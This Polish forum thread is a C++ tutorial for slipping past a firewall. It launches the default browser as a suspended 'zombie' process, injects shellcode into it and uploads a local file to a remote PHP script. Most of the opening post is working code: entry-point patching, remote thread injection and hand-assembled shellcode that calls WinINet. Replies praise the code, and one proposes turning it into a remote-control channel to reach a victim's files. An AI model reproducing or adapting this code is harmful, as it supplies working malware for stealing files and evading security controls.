Pokaż wyniki od 1 do 12 z 12

Temat: [C++]Omijamy Firewall czyli prosta metoda firewall bypass

Dawni Moderatorzy Avatar grzonu

Domyślnie [C++]Omijamy Firewall czyli prosta metoda firewall bypass

Dobra przejdzmy odrazu do konkretow.

Metoda ktora tutaj pokaze sluzy do wysylania plikow (jak ktoś ma troche chęci i wiedzy to bez problemu przerobi to na kod pobierajacy pliki)
    Po co omijamy firewall mam nadzieje że nie musze tłumaczyc

Potrzebne nagłówki:
    Kod:
    #include <Windows.h>
    #include <stdio.h>
    #include <string>
    #include <fstream>
    #include <shlwapi.h>
    Będziemy potrzebować także potrzebowali kodowania base64(jeśli chcemy wysylać pliki binarne)
    nie ukrywam podany tutaj kod konwersji jest wziety z sieci, na potrzeby tego arta nie jest to istotne

Kod:
    static const std::string base64_chars = 
                 "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
                 "abcdefghijklmnopqrstuvwxyz"
                 "0123456789+/";

static inline bool is_base64(unsigned char c) {
      return (isalnum(c) || (c == '+') || (c == '/'));
    }

std::string base64_encode(unsigned char const* bytes_to_encode, unsigned int in_len) {
      std::string ret;
      int i = 0;
      int j = 0;
      unsigned char char_array_3[3];
      unsigned char char_array_4[4];

while (in_len--) {
        char_array_3[i++] = *(bytes_to_encode++);
        if (i == 3) {
          char_array_4[0] = (char_array_3[0] & 0xfc) >> 2;
          char_array_4[1] = ((char_array_3[0] & 0x03) << 4) + ((char_array_3[1] & 0xf0) >> 4);
          char_array_4[2] = ((char_array_3[1] & 0x0f) << 2) + ((char_array_3[2] & 0xc0) >> 6);
          char_array_4[3] = char_array_3[2] & 0x3f;

for(i = 0; (i <4) ; i++)
            ret += base64_chars[char_array_4[i]];
          i = 0;
        }
      }

if (i)
      {
        for(j = i; j < 3; j++)
          char_array_3[j] = '\0';

char_array_4[0] = (char_array_3[0] & 0xfc) >> 2;
        char_array_4[1] = ((char_array_3[0] & 0x03) << 4) + ((char_array_3[1] & 0xf0) >> 4);
        char_array_4[2] = ((char_array_3[1] & 0x0f) << 2) + ((char_array_3[2] & 0xc0) >> 6);
        char_array_4[3] = char_array_3[2] & 0x3f;

for (j = 0; (j < i + 1); j++)
          ret += base64_chars[char_array_4[j]];

while((i++ < 3))
          ret += '=';

}

return ret;

}
    No to teraz pare słów na czym polega metoda. Otóż na 99.9% przegladarka intenetowa ma pozwolenie na komunikacje z internetem
    skorzystamy z tego faktu i wykonamy Code Injection do przegladarki. Kod ktory injectujemy do przegladarki wysle plik na serwer (do skryptu php)
    Ale co zrobić jesli chcemy teraz wyslac plik a przegladarka nie jest wlaczona? Uruchomimy domyslna przegladarke tylko ze zrobimy z niej proces zombie
    Czyli 2 pierwsze bajty w Entry Point nadpiszemy skokiem JMP $ czy jak niektorzy pisza (JMP EIP) wtedy program nie bedzie nic robil a my spokojnie wyslemy plik a potem zamkniemy proces.

Kod:
    HANDLE MakeZombieProcess()
    {
    	char def_brow[MAX_PATH];
    	DWORD out_size=MAX_PATH;
     AssocQueryString(0, ASSOCSTR_EXECUTABLE,"http", "open", def_brow, &out_size);//pobieramy sciezke domyslnej przegladarki
    	STARTUPINFO st={0};
    	PROCESS_INFORMATION pi={0};
     CreateProcess(def_brow,NULL,NULL,NULL,false,CREATE_SUSPENDED,NULL,NULL,&st,&pi);//tworzymy uśpiony proces
    	CONTEXT cx;
    	cx.ContextFlags=CONTEXT_ALL;
    	GetThreadContext(pi.hThread,&cx);

DWORD old;
     VirtualProtectEx(pi.hProcess,(LPVOID)cx.Eax,2,PAGE_EXECUTE_READWRITE,&old);
     WriteProcessMemory(pi.hProcess,(LPVOID)cx.Eax,"\xEB\xFE",2,&old);//napisujemy skokiem
     ResumeThread(pi.hThread);//wlaczamy proces
    	return pi.hProcess;
    }
    Teraz funkcja ktora wysle plik
    Kod:
    void UploadFile(char* filename,char* server,char* script,char* f_name,HANDLE hProc)
    {
    char* buffer;
    	ifstream f(filename,ios::binary);
    	f.seekg(0,ios::end);
    	int size=f.tellg();
    	f.seekg(0,ios::beg);
    	buffer=(char*)malloc(size);
    	int i=0;
    	while(i<size)
    	{
    	buffer[i]=f.get();
    	i++;
    	}
    	f.close();

string buf=base64_encode((const unsigned char*)buffer,size);
    	string hdrs = "Content-Type: multipart/form-data; boundary=---------------------------7d82751e2bc0858"; 
    	string frmdata = "-----------------------------7d82751e2bc0858\nContent-Disposition: form-data; name=\"upl\"; filename=\"";
    	frmdata+=f_name;
     frmdata+="\"\nContent-Type: application/octet-stream\n\n";
    	frmdata+=buf;
    	frmdata+="\n-----------------------------7d82751e2bc0858--";

char* load=(char*)VirtualAllocEx(hProc,0,strlen("wininet.dll"),MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
    	DWORD n_wrt;
    	WriteProcessMemory(hProc,load,"wininet.dll",strlen("wininet.dll"),&n_wrt);
    	HANDLE hThr=CreateRemoteThread(hProc,0,0,(LPTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle("kernel32.dll"),"LoadLibraryA"),load,0,&n_wrt);
    	WaitForSingleObject(hThr,INFINITE);
    	DWORD IB;
    	GetExitCodeThread(hThr,&IB);

char* agent=(char*)VirtualAllocEx(hProc,0,6,MEM_RESERVE|MEM_COMMIT,PAGE_EXECUTE_READWRITE);
    	WriteProcessMemory(hProc,agent,"Agent",6,&n_wrt);
    	char* host=(char*)VirtualAllocEx(hProc,0,strlen(server),MEM_RESERVE|MEM_COMMIT,PAGE_EXECUTE_READWRITE);
    	WriteProcessMemory(hProc,host,server,strlen(server),&n_wrt);
    	char* method=(char*)VirtualAllocEx(hProc,0,strlen("POST"),MEM_RESERVE|MEM_COMMIT,PAGE_EXECUTE_READWRITE);
    	WriteProcessMemory(hProc,method,"POST",strlen("POST"),&n_wrt);
    	char* plik=(char*)VirtualAllocEx(hProc,0,strlen(script),MEM_RESERVE|MEM_COMMIT,PAGE_EXECUTE_READWRITE);
    	WriteProcessMemory(hProc,plik,script,strlen(script),&n_wrt);

DWORD Open=(DWORD)GetProcAddress(LoadLibraryA("wininet.dll"),"InternetOpenA")-(DWORD)GetModuleHandle("wininet.dll")+IB;
    	DWORD Con=(DWORD)GetProcAddress(LoadLibraryA("wininet.dll"),"InternetConnectA")-(DWORD)GetModuleHandle("wininet.dll")+IB;
    	DWORD Req=(DWORD)GetProcAddress(LoadLibraryA("wininet.dll"),"HttpOpenRequestA")-(DWORD)GetModuleHandle("wininet.dll")+IB;
    	DWORD Req_s=(DWORD)GetProcAddress(LoadLibraryA("wininet.dll"),"HttpSendRequestA")-(DWORD)GetModuleHandle("wininet.dll")+IB;

DWORD h_size=hdrs.length();
    	DWORD d_size=frmdata.length();
    	char* head=(char*)VirtualAllocEx(hProc,0,h_size,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
    	char* data=(char*)VirtualAllocEx(hProc,0,d_size,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
    	WriteProcessMemory(hProc,head,hdrs.c_str(),h_size,&n_wrt);
    	WriteProcessMemory(hProc,data,frmdata.c_str(),d_size,&n_wrt);

char shellcode[]="\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x68\xDE\xAD\xC0\xDE\xBB\xDE\xAD\xC0\xDE\xFF\xD3\x6A\x01\x6A\x00\x6A\x03\x6A\x00\x6A\x00\x6A\x50\x68\xDE\xAD\xC0\xDE\x50\xBB\xDE\xAD\xC0\xDE\xFF\xD3\x6A\x01\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x68\xDE\xAD\xC0\xDE\x68\xDE\xAD\xC0\xDE\x50\xBB\xDE\xAD\xC0\xDE\xFF\xD3\x68\xDE\xAD\xC0\xDE\x68\xDE\xAD\xC0\xDE\x68\xDE\xAD\xC0\xDE\x68\xDE\xAD\xC0\xDE\x50\xBB\xDE\xAD\xC0\xDE\xFF\xD3\x33\xC0\xC3";

memcpy((char*)(shellcode+9),&agent,4);
    memcpy((char*)(shellcode+14),&Open,4);
    memcpy((char*)(shellcode+33),&host,4);
    memcpy((char*)(shellcode+39),&Con,4);
    memcpy((char*)(shellcode+56),&plik,4);
    memcpy((char*)(shellcode+61),&method,4);
    memcpy((char*)(shellcode+67),&Req,4);
    memcpy((char*)(shellcode+74),&d_size,4);
    memcpy((char*)(shellcode+79),&data,4);
    memcpy((char*)(shellcode+84),&h_size,4);
    memcpy((char*)(shellcode+89),&head,4);
    memcpy((char*)(shellcode+95),&Req_s,4);

char* Sh=(char*)VirtualAllocEx(hProc,0,sizeof(shellcode),MEM_RESERVE|MEM_COMMIT,PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(hProc,Sh,shellcode,sizeof(shellcode),&n_wrt);
    hThr=CreateRemoteThread(hProc,0,0,(LPTHREAD_START_ROUTINE)Sh,0,0,0);
    WaitForSingleObject(hThr,INFINITE);
    GetExitCodeThread(hThr,&IB);

VirtualFreeEx(hProc,agent,0,MEM_RELEASE);
    VirtualFreeEx(hProc,method,0,MEM_RELEASE);
    VirtualFreeEx(hProc,host,0,MEM_RELEASE);
    VirtualFreeEx(hProc,plik,0,MEM_RELEASE);
    VirtualFreeEx(hProc,head,0,MEM_RELEASE);
    VirtualFreeEx(hProc,data,0,MEM_RELEASE);
    }
    Shellcode jest bardzo prosty(pare pushy i 4 calle)

Przykład użycia:

Kod:
    HANDLE hProc=MakeZombieProcess();//tworzymy proces zombie
     UploadFile("plik_do_wyslania.exe","host.com","upload/upload.php","program.exe",hProc);//Wysylamy plik
     TerminateProcess(hProc,0x0);//zabijamy proces
    Po wykonaniu tego kodu plik_do_wyslania zostanie wyslany do host.com/upload/upload.php jako program.exe nazwa zmiennej w php to "upl"(bez cudzyslowu)[mozna zmienic]

Plik jest kodowany w base64 wiec po odebraniu go przez skrypt php na serwerze musimy do odkodowac(wywolanie 1 funkcji)
    Napisanie skryptu php pozostawiam zainteresowanym bo to już jest dziecinnie proste.

Powodzenia
    Filmy online---Grzonu Blog

1) Moje gg to nie pomoc techniczna w obsludze keyloggerow!!! Na gg i pw pomagam tylko w kwestiach organizacyjnych forum. Masz problem to pisz na forum.
    2) Nie zajmuje sie malware a uprzedzajac pytanie "czemu?" - bo taki mam kaprys!

Użytkownik (R) Avatar D.F.

Domyślnie

Kawał dobrej roboty

Domyślnie

Cytat Napisał grzonu Zobacz post
    Potrzebne nagłówki:
    Kod:
    #include <Windows.h>
    #include <stdio.h>
    #include <string>
    #include <fstream>
    #include <shlwapi.h>
    Czy nie powinno być tutaj co podkreśliłem #include <studio.h>

Ogólnie no to super
    Łamałem ludzi, nie hasła -- Kevin Mitnick
    ----------------------------------------------------------------------------------------------------------------------------------------
    "Tylko dwie rzeczy są nieskończone: wszechświat i ludzka głupota, chociaż co do pierwszego nie mam pewności"- Albert Einstein

Domyślnie

Nie. Tak po prostu nazywa się plik nagłówkowy.

http://www.cplusplus.com/reference/clibrary/cstdio/

A co do kodu - bomba.

Domyślnie

Ahaa no to jeżeli tak to dobrze, nie wiedzialem.
    ----------------------------------------------------------------------------------------------------------------------------------------
    "Tylko dwie rzeczy są nieskończone: wszechświat i ludzka głupota, chociaż co do pierwszego nie mam pewności"- Albert Einstein

Domyślnie

stdio.h czyli STandarD Input Output
    Dzieki za pozytywne opinie

1) Moje gg to nie pomoc techniczna w obsludze keyloggerow!!! Na gg i pw pomagam tylko w kwestiach organizacyjnych forum. Masz problem to pisz na forum.

Użytkownik

Domyślnie

Wszystko dobrze zrobione,brawo

Użytkownik (R) Avatar D.F.

Domyślnie

Jak się pisze w C++ zamiast <stdio.h> powinno się pisać <cstdio>.

Domyślnie

W obu przypadkach nazwa jest nazwą pliku, który chcemy dołączyć do programu. W tym
    miejscu następuje jednak małe zamieszanie. Wszystkie pliki nagłówkowe mają standardowo
    rozszerzenie h. Otóż pliki nagłówkowe pochodzące z czystego języka C++ dołączamy podając
    samą nazwę pliku bez rozszerzenia. Natomiast pliki pochodzące tak naprawdę z poprzednika języka
    C++, czyli języka C włączamy podając nazwę wraz z rozszerzeniem.

Dla przykładu:

#include <iostream>

ale

#include <stdio.h>

Jednocześnie warto wiedzieć, że niektóre biblioteki języka C mają swoje odpowiedniki w języku
    C++. Jeśli biblioteka występowała w języku C jako nazwa.h, to w języku C++ powinniśmy
    spróbować dołączyć ją jako cnazwa - zapisujemy nazwę biblioteki z języka C poprzedzoną literą c
    bez rozszerzenia. W ten sposób otrzymujemy zamiast stdio.h – cstdio, zamiast math.h – cmath,
    zamiast string.h - cstring itd. Oczywiście nie wszystkie biblioteki języka C mają swój odpowiednik w
    C++ - należy wówczas spróbować użyć biblioteki z wersji języka C.

A więc raczej w obu przypadkach jest dobrze nie sądzisz?

Domyślnie

Jestem pod wrażeniem, naprawdę dobry kod

Użytkownik Avatar cpp

Domyślnie

Patrząc na ten kod, na razie nie kompilowałem, wymodziłem coś takiego:

proces zombie sprawdza na jakieś stronce, powiedzmy xxx.republika.pl/index.html proste polecenie tekstowe, pobiera je, przetwarza, wykonuje. Tylko trzeba uprzednio zaprogramować daną akcję na dane polecenie.

Druga sprawa, czego jeszcze nie rozgryzłem to usługa telnet w każdym shitdowsie, nie wiem tylko jeszcze jak postawić serwer, jak to się wymyśli to można wtedy sprawną komunikację przeprowadzać i mieć swobodny dostęp do plików na koncie ofiary ;]

Domyślnie

To jest kod ktory tylko przesyla plik jesli chcesz zeby tez odbieral mozesz spokojnie to napisac(troche wiecej shellcodu)
    I na serwerze zrobic cos w stylu kolejki komunikatow

Uprawnienia